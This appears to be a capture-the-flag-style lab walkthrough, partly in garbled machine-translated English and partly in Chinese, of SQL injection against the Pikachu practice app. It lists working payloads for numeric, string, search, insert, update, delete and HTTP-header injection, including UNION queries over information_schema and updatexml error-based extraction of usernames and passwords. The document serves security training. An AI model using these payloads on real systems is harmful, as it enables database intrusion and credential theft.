Numeric sql injection (POST type):
First 1:
Because it is post type, so the capture amended as permanent establishment:
id=1 or 1=1
You can see, the page returned all the data.
Character sql injection (get type):
Direct input:
Character implants require close sql statement, and then add permanent establishment, all the data:
kobe' or 1=1 #
Search Injection:
Search letter k try:
View source code:
It can be seen here with a search sql statement: select username, id, email from member where username like '% $ name%'
Similarly, the closure may be selected sql statement: k% 'or 1 = 1 #:
Get all the data:
XX-type implant:
Data parcel is different: a ') or 1 = 1 #
:( joint is injected with the last type, for example)
Analyzing the number of fields: a ') order by 3 #
a') order by 2#
May know the number of fields is 2
Then use a joint database query to get: pikachu
a') union select database(),2#
Query the database tables
x') union select table_schema,table_name from information_schema.tables where table_schema='pikachu'#
Query field name in the users table:
x') union select table_name,column_name from information_schema.columns where table_name='users'#
Joint investigation to get a user name and password: a ') union select username, password from users #
Error injection:
Conditions: The background is not being given the information shield
Common functions: updatexml () exactvalue () floor () (floor function)
其他步骤省略(可以根据上面修改payload)。直接得到用户名和密码:
k') and updatexml(1, concat(0x7e,(select (concat_ws('-',username,password)) from pikachu.users limit 0,1) ),1)#
insert注入:
插入类型sql语句: insert into member (username ,pw,sex,phonenum,email,address) valuse('hzk','123456',1,123,123,123);
在插入的必填项中:hzk' or updatexml(1, concat(0x7e,(select (concat_ws('-',username,password)) from pikachu.users limit 0,1) ),1) or '
其他步骤相同,复制payload即可。
update注入:
先登录进去,然后在修改信息的框中直接填入语句即可,payload和insert的相同:
hzk' or updatexml(1, concat(0x7e,(select (concat_ws('-',username,password)) from pikachu.users limit 0,1) ),1) or '
得到用户名和密码
delete类型注入:
删除时抓包看一下:
后台根据id然后删除,发送到repeater,然后改包:
id= 1 or updatexml(1, concat(0x7e,(select (concat_ws('-',username,password)) from pikachu.users limit 0,1) ),1)
因为是在url中,所以需要进行url的编码:
得到用户名密码。
Http Header注入:
登陆之后发现有对头部信息的获取,所以可能存在注入
抓包:
修改user-agent或者cookie完成注入:
firefox'or updatexml(1, concat(0x7e,(select (concat_ws('-',username,password)) from pikachu.users limit 0,1) ),1) or '
得到用户名密码。